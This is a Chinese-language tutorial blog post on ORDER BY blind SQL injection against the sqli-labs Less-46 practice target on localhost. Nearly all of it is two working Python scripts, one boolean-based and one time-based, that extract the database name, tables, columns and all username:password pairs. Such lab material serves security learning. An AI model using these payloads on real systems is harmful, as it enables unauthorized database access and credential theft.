当前位置：首页 > article >正文

order by布尔盲注、时间盲注

article 2025/2/27 6:26:17

pdo防御下，order by、limit不能参数绑定，可以进行sql注入

案例：靶场的less-46

布尔盲注：

import requests
from lxml import html


def get_id_one(URL, paload):
    res = requests.get(url=URL, params=paload)
    tree = html.fromstring(res.content)
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one


def get_database(URL):
    s = ""
    for i in range(1, 10):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr(database(),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("数据库名称:" + s)


def get_table(URL):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("表的名称:" + s)


def get_column(URL):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("列的名称:" + s)


def get_result(URl):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("用户名及密码信息:" + s)


if __name__ == '__main__':
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)

时间盲注：

import requests
import datetime


def get_database(URL):
    s = ""
    for i in range(1, 10):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr(database(),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + hight) // 2

            else:
                hight = mid
                mid = (low + hight) // 2
            # print(chr(mid), mid)
        s += chr(mid)
        print("数据库名称:" + s)


def get_table(URL):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("表的名称:" + s)


def get_column(URL):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("列的名称:" + s)


def get_result(URl):
    s = ""
    for i in range(1, 32):
        low = 32
        hight = 128
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s += chr(mid)
        print("用户名及密码信息:" + s)


if __name__ == '__main__':
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)